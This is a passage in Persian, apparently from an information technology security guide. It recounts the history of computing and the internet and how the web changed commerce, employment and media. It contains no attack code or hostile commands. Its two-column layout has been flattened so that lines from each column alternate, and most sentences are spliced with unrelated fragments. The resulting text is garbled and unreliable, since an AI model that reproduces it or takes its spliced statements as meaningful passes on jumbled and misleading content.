‫ﺩﻳﺠﻴﺘﺎﻝ ﺗﺠﺎﺭﻱ ﻣﻮﺳﻮﻡ ﺑﻪ ‪ UNIVAC I‬ﺑـﻪ ﺳـﺎﺯﻣﺎﻥ ﺁﻣـﺎﺭ ﻭ‬
‫ﻣﻮﻓﻘﻴﺖ ﭘﺎﻳﺪﺍﺭ ﻭ ﻣﺪﺍﻭﻡ ﻛـﺸﻮﺭﻫﺎﻱ ﺗﻮﺳـﻌﻪﻳﺎﻓﺘـﻪ ﻳـﻚ ﻋﺎﻣـﻞ‬
‫ﺳﺮﺷﻤﺎﺭﻱ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﺁﻣﺮﻳﻜﺎ‪ ٢‬ﺗﺤﻮﻳﻞ ﺩﺍﺩﻩ ﺷﺪ‪ ،‬ﺑﺴﻴﺎﺭﻱ ﺍﺯ‬
‫ﺣﻴﺎﺗﻲ ﺑﺸﻤﺎﺭ ﻣﻲﺭﻭﺩ ﻭ ﺍﻫﻤﻴﺖ ﺁﻥ ﺑـﺮﺍﻱ ﻛـﺸﻮﺭﻫـﺎﻱ ﺩﺭﺣـﺎﻝ‬
‫ﻣﺮﺩﻡ ﺩﺭ ﻣﻮﺭﺩ ﺭﺍﻳﺎﻧﻪﻫﺎ ﭼﻴﺰﻱ ﻧﻤﻲﺩﺍﻧﺴﺘﻨﺪ ﻭ ﺁﻥ ﺭﺍﻳﺎﻧـﻪﻫـﺎ ﻧﻴـﺰ‬
‫ﺗﻮﺳﻌﻪ ﻧﻴﺰ ﺑﺴﺮﻋﺖ ﺭﻭ ﺑﻪ ﺍﻓﺰﺍﻳﺶ ﺍﺳﺖ‪ .‬ﺁﺛﺎﺭ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎ‬
‫ﺗﻨﻬﺎ ﺩﺭ ﺗﻌﺪﺍﺩ ﺍﻧﮕﺸﺖ ﺷﻤﺎﺭﻱ ﺍﺯ ﺩﺍﻧﺸﮕﺎﻫﻬﺎ ﻭ ﺁﺯﻣﺎﻳـﺸﮕﺎﻫﻬﺎﻱ‬
‫ﻭ ﻧﺘﺎﻳﺞ ﺣﺎﺻﻠﻪ ﺍﺯ ﺍﻧﻘﻼﺏ ﺍﻳﻨﺘﺮﻧﺖ ﺍﺯ ﻣﺮﺯ ﻓﻮﺍﻳـﺪ ﻣـﺴﺘﻘﻴﻢ ﺁﻧﻬـﺎ‬
‫ﺗﺤﻘﻴﻘﺎﺗﻲ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺩﺍﺷﺘﻨﺪ‪ .‬ﺍﻳﻦ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺑﺰﺭﮒ‪ ،‬ﮔﺮﺍﻥ‬
‫ﻓﺮﺍﺗﺮ ﺭﻓﺘﻪ ﻭ ﭘﻴﺶﺑﻴﻨﻲ ﻣﻲﺷﻮﺩ ﻛﻪ ﺗﺄﺛﻴﺮﺍﺕ ﺑﻴﺸﺘﺮﻱ ﻧﻴﺰ ﺩﺭ ﺭﺍﻩ‬
‫ﻭ ﻣﻤﻠﻮ ﺍﺯ ﺍﺷﻜﺎﻝ ﺑﻮﺩﻧﺪ‪ .‬ﺩﺭ ﻣﻘﺎﺑﻞ‪ ،‬ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺍﻣﺮﻭﺯﻱ ﺍﻧﺪﺍﺯﻩﺍﻱ‬
‫ﺑﺎﺷﻨﺪ‪.‬‬
‫ﻧﺴﺒﺘﹰﺎ ﻛﻮﭼﻚ ﺩﺍﺭﻧﺪ‪ ،‬ﺍﺭﺯﺍﻥ ﻭ ﻗﺎﺑﻞ ﺍﻃﻤﻴﻨﺎﻥ ﻫﺴﺘﻨﺪ ﻭ ﻣـﻲﺗـﻮﺍﻥ‬
‫ﺍﻭﻝ ﺍﺯ ﻫﻤﻪ ﺍﻳﻨﻜﻪ ﺍﻳﻨﺘﺮﻧﺖ ﻣﺮﺯﻫﺎﻱ ﺟﻐﺮﺍﻓﻴﺎﻳﻲ ﻣﻴـﺎﻥ ﻛـﺎﺭﺑﺮﺍﻥ‬ ‫ﺁﻧﻬﺎ ﺭﺍ ﺩﺭ ﻫﺮ ﻛﺸﻮﺭﻱ ﻳﺎﻓﺖ‪.‬‬
‫ﻣﺘﺼﻞ ﺑﻪ ﺧﻮﺩ ﺭﺍ ﻛﻤﺮﻧﮓ ﻛﺮﺩﻩ ﻭ ﺭﻭﻧﺪ ﺟﻬﺎﻧﻲﺳﺎﺯﻱ ﺭﺍ ﺑﺎ ﺍﺭﺍﺋـﻪ‬
‫ﺑــﻪ ﻓﺎﺻــﻠﺔ ﻛﻮﺗــﺎﻫﻲ ﭘــﺲ ﺍﺯ ﺭﻭﺍﺝ ﺭﺍﻳﺎﻧــﻪﻫــﺎ ﺩﺭ ﺩﺍﻧــﺸﮕﺎﻫﻬﺎ‪،‬‬
‫ﻗﺎﺑﻠﻴﺘﻬﺎﻱ ﺭﺳﺎﻧﻪﻫﺎﻱ ﺍﺭﺗﺒﺎﻃﻲ ﺗﺴﻬﻴﻞ ﻧﻤﻮﺩﻩ ﻭ ﻟـﺬﺍ ﻫـﺮ ﻛـﺴﻲ‬
‫ﭘﺮﻭﮊﻩﻫﺎﻱ ﺗﺤﻘﻴﻘﺎﺗﻲ ﺑﺮﺍﻱ ﻣﺮﺗﺒﻂ ﺳﺎﺧﺘﻦ ﺁﻧﻬﺎ ﺑـﺎ ﻳﻜـﺪﻳﮕﺮ ﺑـﻪ‬
‫ﻣﺴﺘﻘﻞ ﺍﺯ ﻣﺤﻞ ﻓﻴﺰﻳﻜﻲ ﺧﻮﺩ ﻗﺎﺩﺭ ﺑﻪ ﺑﺮﻗـﺮﺍﺭﻱ ﺍﺭﺗﺒـﺎﻁ ﺑـﺎ ﺁﻥ‬
‫ﻧﺤﻮﻱ ﻛﻪ ﺍﻣﻜﺎﻥ ﻣﺒﺎﺩﻟﺔ ﺍﻃﻼﻋﺎﺕ ﻣﻴﺎﻥ ﺁﻧﻬﺎ ﺑﻮﺟـﻮﺩ ﺁﻳـﺪ ﺁﻏـﺎﺯ‬
‫ﻣﻲﺑﺎﺷﺪ‪ .‬ﻣﻮﺗﻮﺭﻫـﺎﻱ ﺟـﺴﺘﺠﻮ‪ ٨‬ﺑـﺮ ﺭﻭﻧـﺪ ﺍﻳـﻦ ﺗﻐﻴﻴـﺮ ﺗـﺄﺛﻴﺮﻱ‬
‫ﺷــﺪﻧﺪ‪ .‬ﺍﺯ ﻣﻴــﺎﻥ ﺍﻳــﻦ ﭘــﺮﻭﮊﻩﻫــﺎ‪ ،‬ﭘــﺮﻭﮊﺓ ﺗﻮﺳــﻌﺔ ﺷــﺒﻜﺔ‬
‫ﻣﻀﺎﻋﻒ ﺩﺍﺷﺘﻪﺍﻧﺪ؛ ﭼﺮﺍﻛﻪ ﻧﺘﺎﻳﺞ ﺟﺴﺘﺠﻮ ﺑﺮ ﺍﺳﺎﺱ ﻣﻮﺿـﻮﻋﺎﺕ‬
‫‪ ARPANET‬ﻣﻮﻓﻘﻴﺖ ﺑﻴﺸﺘﺮﻱ ﻛﺴﺐ ﻛﺮﺩ ﻭ ﺑـﻪ ﺁﻥ ﭼﻴـﺰﻱ‬
‫ﻇﺎﻫﺮ ﻣﻲﺷﻮﻧﺪ ﻭ ﻧﻪ ﺑﺮ ﺍﺳﺎﺱ ﻓﺎﺻﻠﻪﺍﻱ ﻛﻪ ﻛﺎﺭﺑﺮ ﺑﺎ ﺁﻧﻬـﺎ ﺩﺍﺭﺩ؛‬
‫ﺗﺒﺪﻳﻞ ﺷﺪ ﻛﻪ ﺍﻣﺮﻭﺯ ﺁﻧﺮﺍ ﺑﻌﻨﻮﺍﻥ "ﺍﻳﻨﺘﺮﻧﺖ" ﻣﻲﺷﻨﺎﺳﻴﻢ ﻭ ﺩﺭﺣﺎﻝ‬
‫ﺏ ﻛﺎﺭﺧﺎﻧﺠــﺎﺕ ﻭ ﺷــﺮﻛﺘﻬﺎﻱ ﻭﺍﻗــﻊ ﺩﺭ‬ ‫ﺑﻄﻮﺭﻳﻜــﻪ ﭘﺎﻳﮕــﺎﻩ ﻭ ﹺ‬
‫ﺣﺎﺿﺮ ﺑﻴﺶ ﺍﺯ ‪ ۳۰۰‬ﻣﻴﻠﻴﻮﻥ ﺭﺍﻳﺎﻧﻪ ﺭﺍ ﺩﺭ ﺳﺮﺍﺳﺮ ﺟﻬﺎﻥ ﺑـﻪ ﻫـﻢ‬
‫ﻛﺸﻮﺭﻫﺎﻱ ﺗﻮﺳﻌﻪﻳﺎﻓﺘﻪ ﻭ ﺩﺭﺣﺎﻝ ﺗﻮﺳـﻌﻪ ﺍﺯ ﻣﻮﻗﻌﻴـﺖ ﻳﻜـﺴﺎﻧﻲ‬
‫ﻣﺮﺗﺒﻂ ﻛﺮﺩﻩ ﺍﺳﺖ‪.‬‬
‫ﺑﺮﺍﻱ ﻧﻈﺎﺭﻩﺷﺪﻥ ﺗﻮﺳﻂ ﻣﺮﺍﺟﻌﻴﻦ ﺑﺮﺧﻮﺭﺩﺍﺭ ﻫﺴﺘﻨﺪ‪.‬‬
‫‪٥‬‬
‫ﺷﺒﻜﺔ ﺟﻬﺎﻧﻲ ﻭﺏ‪ ٣‬ﻛﻪ ﺗﻮﺳﻂ ﺗﻴﻢ ﺑﺮﻧﺮﺯ ﻟﻲ‪ ٤‬ﻭ ﺭﺍﺑـﺮﺕ ﻛـﺎﻳﻠﻴﻮ‬
‫ﺩﻭﻣﻴﻦ ﻣﺴﺌﻠﻪ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺍﻳﻨﺘﺮﻧﺖ ﺗﺄﺛﻴﺮﻱ ﺷﮕﺮﻑ ﺩﺭ ﻓﺮﺁﻳﻨـﺪ‬
‫ﺩﺭ ﻣﺮﻛﺰ ﺗﺤﻘﻴﻘﺎﺕ ﻫﺴﺘﻪﺍﻱ ﺍﺭﻭﭘﺎ‪ ٦‬ﺩﺭ ﺍﻭﺍﻳﻞ ﺩﻫﺔ ‪ ۹۰‬ﻣﻴﻼﺩﻱ ﻭ‬
‫ﺣﺬﻑ ﻭﺍﺳﻄﻪﻫﺎﻱ ﺗﺠﺎﺭﻱ ﺩﺍﺷﺘﻪ ﺍﺳﺖ‪ .‬ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﻣـﻲﺗـﻮﺍﻥ‬
‫ﺩﺭ ﺷﻬﺮ ﮊﻧﻮ ﺍﻳﺠﺎﺩ ﺷﺪ ﺳﺮﻭﻳﺲ ﻗﺪﺭﺗﻤﻨﺪﻱ ﺍﺳﺖ ﻛﻪ ﺍﺯ ﺍﻳﻨﺘﺮﻧﺖ‬
‫ﺑــﻪ ﻛــﺎﻫﺶ ﭼــﺸﻤﮕﻴﺮ ﻧــﺮﺥ ﺍﺳــﺘﺨﺪﺍﻡ ﻣﻨــﺸﻲ ﺩﺭ ﻛــﺸﻮﺭﻫﺎﻱ‬
‫ﺗﻮﺳﻌﻪﻳﺎﻓﺘﻪ ﺍﺷﺎﺭﻩﻛﺮﺩ ﻛﻪ ﺩﻟﻴﻞ ﺁﻥ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻧﻮﺷﺘﻦ ﻣﺘﻦ ﻭ‬
‫‪1‬‬ ‫‪Digital Tornado: The Internet and‬‬
‫ﭼﺎﭖ ﻭ ﺍﺭﺳﺎﻝ ﭘﻴﺎﻡ ﺷﺨﺼﻲ ﺑﺮﺍﻱ ﺍﻓـﺮﺍﺩ ﺍﺯ ﻃﺮﻳـﻖ ﺗـﺴﻬﻴﻼﺗﻲ‬ ‫‪Telecommunications Policy FCC Staff‬‬
‫‪Working Paper on Internet Policy (1997):‬‬
‫ﭼﻮﻥ ﭘﺮﺩﺍﺯﺷﮕﺮ ﻛﻠﻤﺎﺕ ﻭ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺁﺳـﺎﻧﺘﺮ ﺍﺯ ﺩﻳﻜﺘـﻪ‬ ‫‪http://www.fcc.gov/Bureaus/Miscellaneous/Ne‬‬
‫ﻛــﺮﺩﻥ ﻣــﺘﻦ ﺑــﺮﺍﻱ ﻳــﻚ ﻣﻨــﺸﻲ ﺍﺳــﺖ‪ .‬ﺑــﻪ ﻫﻤــﻴﻦ ﺗﺮﺗﻴــﺐ‬ ‫‪ws_Releases/1997/nrmc7020.html‬‬
‫‪2‬‬ ‫‪U.S. Bureau of Census‬‬
‫‪3‬‬ ‫‪World-Wide Web‬‬
‫‪4‬‬ ‫‪Tim Berners-Lee‬‬
‫‪5‬‬ ‫‪Robert Cailliau‬‬
‫‪7‬‬ ‫‪Services‬‬ ‫‪6‬‬ ‫‪Center for European Nuclear Research‬‬
‫‪8‬‬ ‫‪Search Engine‬‬ ‫)‪(CERN‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٢٨‬‬

‫ﺭﻭﺍﺑﻂ ﻛﺎﺭﻱ ﺑﺮ ﺍﺳﺎﺱ ﮔﻔﺘﮕﻮﻫـﺎﻱ ﺭﻭ ﺩﺭ ﺭﻭ ﺍﻧﺠـﺎﻡ ﻣـﻲﮔﻴـﺮﺩ‬ ‫ﻱ ﺩﺳﺘﻪﺟﻤﻌﻲ ﻧﻴﺰ ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﺭﻭ ﺑﻪ ﺍﻧﻘﺮﺍﺽ ﺍﺳﺖ‪،‬‬ ‫ﮔﺮﺩﺷﮕﺮ ﹺ‬
‫ﻛﻤﺎﺑﻴﺶ ﺍﺯ ﺍﻫﻤﻴﺖ ﻳﻜﺴﺎﻧﻲ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺍﺳﺖ‪.‬‬ ‫ﭼﺮﺍﻛﻪ ﮔﺮﺩﺷـﮕﺮﺍﻥ ﻣـﻲ ﺗﻮﺍﻧﻨـﺪ ﺑﻠﻴﻄﻬـﺎﻱ ﻫـﻮﺍﻳﻲ ﻳـﺎ ﻗﻄـﺎﺭ ﻭ‬
‫ﻫﻤﭽﻨﻴﻦ ﺍﺗﺎﻗﻬﺎﻱ ﻫﺘﻞ ﻣﻮﺭﺩ ﻧﻈﺮ ﺧﻮﺩ ﺭﺍ ﺑﺼﻮﺭﺕ ﺑـﺮﺧﻂ‪ ٩‬ﺭﺯﺭﻭ‬
‫ﺍﻳﻦ ﻣﻄﻠﺐ ﺩﺭ ﻣﻮﺭﺩ ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﻧﻴﺰ ﻭﺍﺿﺢ ﺍﺳـﺖ‪:‬‬
‫ﻛﻨﻨﺪ ﻭ ﺍﻳﻦ ﺍﻣﺮ ﻣﻮﺟﺐ ﺻﺮﻓﻪﺟﻮﻳﻲ ﺩﺭ ﻫﺰﻳﻨﻪ ﻭ ﻭﻗﺖ ﻣـﺸﺘﺮﻱ‬
‫ﺳﺎﺯﻣﺎﻧﻬﺎﻳﻲ ﻛﻪ ﺑﻪ ﺳـﻄﺢ ﺍﻣﻨﻴﺘـﻲ ﻣﻨﺎﺳـﺒﻲ ﺩﺭ ﺯﻳـﺮﺳـﺎﺧﺘﻬﺎﻱ‬
‫ﺷﺪﻩ ﻭ ﺑﺎﻋﺚ ﺷﺪﻩ ﺑﺘﻮﺍﻥ ﺑﺎ ﻛﻤﻲ ﺩﻗﺖ ﺭﻭﻱ ﺳﻔﺎﺭﺷﺎﺕ‪ ،‬ﺍﺯ ﻳـﻚ‬
‫ﺩﻳﺠﻴﺘﺎﻟﻲ ﺧﻮﺩ ﺩﺳﺖ ﻧﻴﺎﻓﺘﻪ ﻭ ﺍﺯ ﺍﺭﺳﺎﻝ ﺍﻃﻼﻋـﺎﺕ ﺧـﻮﻳﺶ ﺑـﻪ‬
‫ﺳﻔﺮ ﻣﻔﺮﺡ ﻟـﺬﺕ ﺑـﺮﺩ‪ .‬ﭘﻴـﺪﺍﻳﺶ ﺷـﺮﻛﺘﻬﺎﻱ ﻓﺮﻭﺷـﻨﺪﺓ ﻛﺘـﺎﺏ‪،‬‬
‫ﻧﺤﻮ ﻣﻄﻠﻮﺑﻲ ﻣﺤﺎﻓﻈﺖ ﻧﻤﻲﻛﻨﻨﺪ ﺷﺎﻳﺴﺘﺔ ﺍﻋﺘﻤﺎﺩ ﻧﺨﻮﺍﻫﻨﺪ ﺑـﻮﺩ‬
‫‪١٠‬‬ ‫ﻣﻮﺳﻴﻘﻲ ﻭ ﻣﺤـﺼﻮﻻﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺑـﺼﻮﺭﺕ ﺑـﺮﺧﻂ ﻣﻮﺟـﺐ‬
‫ﻭ ﺍﺯ ﻛﺎﺭﻭﺍﻥ ﺍﻗﺘﺼﺎﺩ ﻧﻮﻳﻦ ﺟﻬﺎﻧﻲ ﻋﻘﺐ ﺧﻮﺍﻫﻨﺪ ﻣﺎﻧﺪ‪.‬‬
‫ﺗﻬﺪﻳــﺪ ﻭ ﺿــﺮﺑﻪ ﺑــﻪ ﻓﺮﻭﺷــﮕﺎﻫﻬﺎﻱ ﻋﺮﺿــﻪﻛﻨﻨــﺪﺓ ﺍﻳﻨﮕﻮﻧــﻪ‬
‫ﺍﻧﻘﻼﺏ ﺩﻳﺠﻴﺘﺎﻝ‬ ‫ﻣﺤﺼﻮﻻﺕ ﺷﺪﻩ‪ ،‬ﺍﻣﺎ ﺩﺭ ﻋﻴﻦ ﺣﺎﻝ ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺑﺨﺸﻬﺎﻱ ﺍﻳﻦ‬
‫ﺻﻨﻒ ﺑﻪ ﮔﺴﺘﺮﺩﻩﺗﺮ ﺷﺪﻥ ﻃﻴﻒ ﺑﺎﺯﺍﺭ ﻫﺪﻑ ﻧﻴﺰ ﺍﻧﺠﺎﻣﻴﺪﻩ ﺍﺳﺖ‪.‬‬
‫ﺍﻣﺮﻭﺯﻩ ﻓﻨﺎﻭﺭﻱ ﺩﻳﺠﻴﺘﺎﻝ ﺍﺯ ﺣﻴﻄﺔ ﺭﺍﻳﺎﻧﻪﻫـﺎ ﻓﺮﺍﺗـﺮ ﺭﻓﺘـﻪ ﺍﺳـﺖ‪.‬‬ ‫ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﺣﺮﻓـﻪﻫـﺎ ﻭ ﺻـﻨﺎﻳﻊ ﺳـﻨﺘﻲ ﺑـﻪ ﻭﺟـﻮﺩ ﺧـﻮﺩ ﺍﺩﺍﻣـﻪ‬
‫ﭘﻴﺸﺮﻓﺘﻬﺎﻱ ﻓﻨﺎﻭﺭﻱ ﺩﺭ ﺻﻨﻌﺖ ﻣﻴﻜﺮﻭﺍﻟﻜﺘﺮﻭﻧﻴﻚ ﺍﻣﻜﺎﻥ ﺳﺎﺧﺖ‬ ‫ﻣﻲﺩﻫﻨﺪ‪ ،‬ﺗﻤﺎﻳﻞ ﺩﺍﺭﻧﺪ ﺍﻓﺮﺍﺩ ﻛﻤﺘـﺮﻱ ﺑـﻪ ﺍﺳـﺘﺨﺪﺍﻡ ﺩﺭﺁﻭﺭﻧـﺪ ﻭ‬
‫ﺍﺑﺰﺍﺭﻫﺎﻱ ﭘﻴﭽﻴﺪﺓ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺩﺭ ﻣﻘﻴﺎﺳﻬﺎﻱ ﺑـﺴﻴﺎﺭ ﻛﻮﭼـﻚ ﺭﺍ‬ ‫ﺣﺘﻲ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺠـﺎﻱ ﺍﺭﺍﺋـﻪ ﺧـﺪﻣﺎﺕ ﻋﻤـﻮﻣﻲ ﺑـﻪ ﺳـﻤﺖ‬
‫ﻓﺮﺍﻫﻢ ﺁﻭﺭﺩﻩ ﺑﻄﻮﺭﻳﻜﻪ ﺍﻛﻨﻮﻥ ﺷﻤﺎ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺗﺠﻬﻴﺰﺍﺕ ﺍﺭﺗﺒﺎﻃﻲ‬ ‫ﺑﺎﺯﺍﺭﻫﺎﻱ ﺗﺨﺼﺼﻲ ﺣﺮﻛﺖ ﻛﻨﻨﺪ‪ .‬ﺗﺄﺛﻴﺮﺍﺕ ﻣﺸﻬﻮﺩ ﺭﻭﻧـﺪ ﺣـﺬﻑ‬
‫ﻭ ﻣﺤﺎﺳﺒﺎﺗﻲ ﺑﺴﻴﺎﺭ ﭘﻴﭽﻴﺪﻩ ﺭﺍ ﺩﺭ ﺟﻴﺐ ﺧﻮﺩ ﺟﺎﻱ ﺩﻫﻴﺪ‪ .‬ﻋـﻼﻭﻩ‬ ‫ﻭﺍﺳﻄﻪﻫﺎ ﻛﻪ ﺑﺎ ﻇﻬﻮﺭ ﺍﻳﻦ ﻓﻨـﺎﻭﺭﻱ ﺷـﺮﻭﻉ ﺷـﺪ ﺑـﺮﺍﻱ ﻣـﺪﺗﻲ‬
‫ﺑﺮ ﺍﻳﻦ ﺑﻬﺒﻮﺩ ﻧﺴﺒﺖ ﻗﻴﻤﺖ ﺑﻪ ﻛﺎﺭﺁﻳﻲ ﺑﺮﺍﻱ ﺍﻳﻦ ﻧﻮﻉ ﻓﻨﺎﻭﺭﻱ ﺩﺭ‬ ‫ﻃﻮﻻﻧﻲ ﺍﺩﺍﻣﻪ ﺧﻮﺍﻫﺪ ﻳﺎﻓـﺖ ﻭ ﺑـﺎ ﺍﻫﻤﻴـﺖ ﺭﻭﺯﺍﻓـﺰﻭﻥ ﻓﻨـﺎﻭﺭﻱ‬
‫ﻫﺮ ﺳﺎﻝ ﭼﻴـﺰﻱ ﺣـﺪﻭﺩ ‪ %۳۰‬ﺍﺳـﺖ ﻭ ﺍﺣﺘﻤـﺎﻝ ﺑﺮﻗـﺮﺍﺭﻱ ﺍﻳـﻦ‬ ‫ﺍﻃﻼﻋﺎﺕ‪ ،‬ﺻﻨﺎﻳﻊ ﻭ ﺣﺮﻓﻪﻫﺎﻱ ﺑﻴﺸﺘﺮﻱ ﺑﺎ ﺁﻥ ﺟﺎﻳﮕﺰﻳﻦ ﺧﻮﺍﻫﻨﺪ‬
‫ﻧﺴﺒﺖ ﺗﺎ ﺩﻩ ﺳﺎﻝ ﺁﻳﻨﺪﻩ ﻧﻴﺰ ﺑﺴﻴﺎﺭ ﺑﺎﻻﺳـﺖ‪ ١١.‬ﺍﻧﺘﻈـﺎﺭ ﻣـﺎ ﺍﻳـﻦ‬ ‫ﺷﺪ‪.‬‬
‫ﺍﺳﺖ ﻛﻪ ﺍﻳﻦ ﻓﻨـﺎﻭﺭﻱ ﻣـﻮﺭﺩ ﺍﺳـﺘﻘﺒﺎﻝ ﮔـﺴﺘﺮﺩﻩ ﻗـﺮﺍﺭ ﮔﻴـﺮﺩ ﻭ‬
‫ﻋﺮﺻﻪﻫﺎﻱ ﻧﻮﻳﻨﻲ ﺩﺭ ﺗﺠﺎﺭﺕ ﭘﺪﻳﺪ ﺁﻭﺭﺩ ﻭ ﻧﻘﻄﺔ ﺷﺮﻭﻋﻲ ﺑـﺮﺍﻱ‬ ‫ﺳﻮﻣﻴﻦ ﭘﻴﺎﻣﺪ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻧﺮﺥ ﺑﻬـﺮﻩﻭﺭﻱ ﺣـﺪﺍﻗﻞ ﺩﺭ ﺻـﻨﺎﻳﻊ‬
‫ﺁﻏﺎﺯ ﻋﺼﺮ ﻃﻼﻳﻲ ﻓﻨﺎﻭﺭﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺑﺎﺷﺪ‪.‬‬ ‫ﻭﺍﺑﺴﺘﻪ ﺑﻪ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺑﺎ ﺷﺘﺎﺑﻲ ﭼﺸﻤﮕﻴﺮ ﺍﻓﺰﺍﻳﺶ ﺧﻮﺍﻫﺪ‬
‫ﻳﺎﻓﺖ‪ .‬ﺑﻪ ﻛﻤـﻚ ﭘـﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺍﻣﻜـﺎﻥ ﺍﺭﺳـﺎﻝ ﻭ ﺗﺒـﺎﺩﻝ‬
‫ﻼ ﺩﻳﺠﻴﺘــﺎﻟﻲ ﻫــﺴﺘﻨﺪ ﻭ‬
‫ﺗﺠﻬﻴــﺰﺍﺕ ﺗﻠﻔﻨــﻲ ﻣــﺪﺭﻥ ﺍﻣــﺮﻭﺯ ﻛــﺎﻣ ﹰ‬ ‫ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﺳﺮﺍﺳﺮ ﺟﻬﺎﻥ ﻃﻲ ﺗﻨﻬﺎ ﭼﻨﺪ ﺛﺎﻧﻴـﻪ ﻣﻤﻜـﻦ ﺷـﺪﻩ‪،‬‬
‫ﺳﻴـــﺴﺘﻤﻬﺎﻱ ﻫﺪﻓﻤﻨـــﺪ ﺭﺍﻳﺎﻧـــﻪﺍﻱ ﺟـــﺎﻳﮕﺰﻳﻦ ﺗﺠﻬﻴـــﺰﺍﺕ‬ ‫ﺑﻄﻮﺭﻳﻜﻪ ﻣﺒﺎﺣﺚ ﻭ ﻣﺬﺍﻛﺮﺍﺕ ﺟﻬﺎﻧﻲ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﺑﺴﻴﺎﺭ ﺳـﺮﻳﻌﺘﺮ‬
‫‪ Switching‬ﻣﺒﺘﻨﻲ ﺑﺮ ﺭﻟﺔ ﻣﻜﺎﻧﻴﻜﻲ ﺷﺪﻩﺍﻧﺪ‪ .‬ﺍﺯ ﺯﻣﺎﻥ ﭘﻴﺪﺍﻳﺶ‬ ‫ﺍﺯ ﮔﺬﺷﺘﻪ ﭘﻴﮕﻴﺮﻱ ﻛﺮﺩ ﻭ ﺑﻪ ﻧﺘﻴﺠﻪ ﺭﺳﺎﻧﺪ‪ .‬ﺍﻣﻮﺭ ﺑﺎﺯﺭﮔﺎﻧﻲ ﻛﻪ ﺗـﺎ‬
‫ﺩﻳﺴﻚ ﻓﺸﺮﺩﻩ ﺩﺭ ﺍﻭﺍﺧﺮ ﺩﻫـﺔ ‪ ۸۰‬ﻣـﻴﻼﺩﻱ‪ ،‬ﺻـﺪﺍ ﻭ ﻣﻮﺳـﻴﻘﻲ‬ ‫ﭼﻨﺪﻱ ﻗﺒﻞ ﺍﺯ ﻃﺮﻳﻖ ﭘﺴﺖ‪ ،‬ﺗﻠﻜﺲ ﻭ ﺗﻠﻔـﻦ ﺍﻧﺠـﺎﻡ ﻣـﻲﺷـﺪﻧﺪ‬
‫ﺷﻜﻞ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺑﻪ ﺧﻮﺩ ﮔﺮﻓﺘﻪ ﻭ ﺑـﺎ ﭘﻴـﺪﺍﻳﺶ ﻗﺎﻟـﺐ ﻣﻮﺳـﻴﻘﻲ‬ ‫ﺍﻛﻨﻮﻥ ﺑﺎ ﺑﻜﺎﺭﮔﻴﺮﻱ ﻣﻔﺎﻫﻴﻤﻲ ﻧﻮﻳﻦ ﺩﺭ ﺻﻨﻌﺖ ﻣﺨﺎﺑﺮﺍﺕ ﺳـﻴﺎﺭ‪،‬‬
‫‪ MP3‬ﺩﺭ ﺍﻭﺍﺧــﺮ ﺩﻫــﺔ ‪ ۹۰‬ﻣــﻴﻼﺩﻱ ﺿــﺒﻂ ﺻــﺪﺍ ﺣﺘــﻲ ﺩﺭ‬ ‫ﺳﺮﻳﻌﺘﺮ ﻭ ﻛﺎﺭﺁﻣﺪﺗﺮ ﺑﻪ ﺍﻧﺠﺎﻡ ﻣـﻲﺭﺳـﻨﺪ ﻭ ﺍﻳـﻦ ﻣـﺴﺌﻠﻪ ﭼﺮﺧـﺔ‬
‫ﻼ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺷﺪﻩ ﺍﺳـﺖ‪ .‬ﺩﺭ ﺩﻧﻴـﺎﻱ‬ ‫ﻣﺤﻴﻄﻬﺎﻱ ﺧﺎﻧﮕﻲ ﻧﻴﺰ ﻛﺎﻣ ﹰ‬ ‫ﺯﻣﺎﻧﻲ ﺍﻧﺠﺎﻡ ﻓﻌﺎﻟﻴﺘﻬﺎ ﺭﺍ ﻛﺎﻫﺶ ﺩﺍﺩﻩ ﺍﺳﺖ‪.‬‬
‫ﻋﻜﺎﺳﻲ ﻭ ﻓﻴﻠﻤﺒـﺮﺩﺍﺭﻱ ﻧﻴـﺰ ﺗـﺼﺎﻭﻳﺮ ﺩﻳﺠﻴﺘـﺎﻟﻲ ﻭ ﺩﻭﺭﺑﻴﻨﻬـﺎﻱ‬
‫ﺩﻳﺠﻴﺘﺎﻟﻲ ﺛﺒﺖ ﺗﺼﺎﻭﻳﺮ ﻓﻴﻠﻤﻬﺎﻱ ﻋﻜﺎﺳﻲ ﮔﺸﺘﻪﺍﻧﺪ‪.‬‬ ‫ﻧﻜﺘﺔ ﺁﺧﺮ ﺍﻳﻨﻜﻪ ﺍﻳﻤﻦ ﻧﮕﺎﻩ ﺩﺍﺷـﺘﻦ ﻣﺤـﻞ ﺫﺧﻴـﺮﺓ ﺍﻃﻼﻋـﺎﺕ ﻭ‬
